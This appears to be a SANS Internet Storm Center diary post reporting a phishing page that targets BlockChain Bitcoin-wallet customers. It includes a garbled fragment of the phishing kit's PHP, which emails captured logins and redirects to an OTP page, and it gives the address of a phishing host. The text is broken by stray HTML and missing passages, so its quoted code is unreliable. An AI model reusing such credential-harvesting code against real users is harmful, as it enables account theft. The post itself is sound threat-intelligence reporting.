Wireshark 'dissectors/asn1/ros/packet-ros-template.c' Denial of Service Vulnerability
 
Multiple Asterisk Products Denial of Service Vulnerability
 
Multiple Asterisk Products Denial of Service Vulnerability
 
Multiple Asterisk Products 'PJSIP Transaction Layer' Heap Based Buffer Overflow Vulnerability
 

Those phishing emails that we receive every day in our mailboxes are often related to key players in different fields:

Internet actors Google, Yahoo!, Facebook, ...
Software or manufacturers Apple, Microsoft, Adobe, ...
Financial Services Paypal, BoA, name your preferred bank, ...
Services DHL, eBay, ...

But the landscape of online services is ever changing and new actors (and more precisely their customers) become new interesting targets. Yesterday, while hunting, I found for the first time aphishing page trying to lure the Bitcoinoperator: BlockChain. Blockchain[1] is a key player in the management of width:600px" />

Hopefully, the webshellisn padding:5px 10px"> $from = From: b [email protected]\n $from .= MIME-Version: 1.0\r\n $from .= charset=ISO-8859-1\r\n if(@$_GET[accedi]==login){ mail([email protected] header( Location: richiesta_otp.html }else{

Note that the login procedure on BlockChain is extremely strong: 2FA authentication and one-time link is sent via email to approve all login attempts. Be sure that activate them if youre a BlockChain customer.

The fact that Bitcoins, the digital currency, is getting more and more popular makes it a new interesting target for attackers. And this is also the case in corporate environments: There is a trend in companies that make a reserve of Bitcoins to prevent possible Ransomware attacks![3]

[1] https://www.blockchain.com
[2]http://klimatika.com.ua/block/
[3]https://www.technologyreview.com/s/601643/companies-are-stockpiling-bitcoin-to-pay-off-cybercriminals/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

 
Internet Storm Center Infocon Status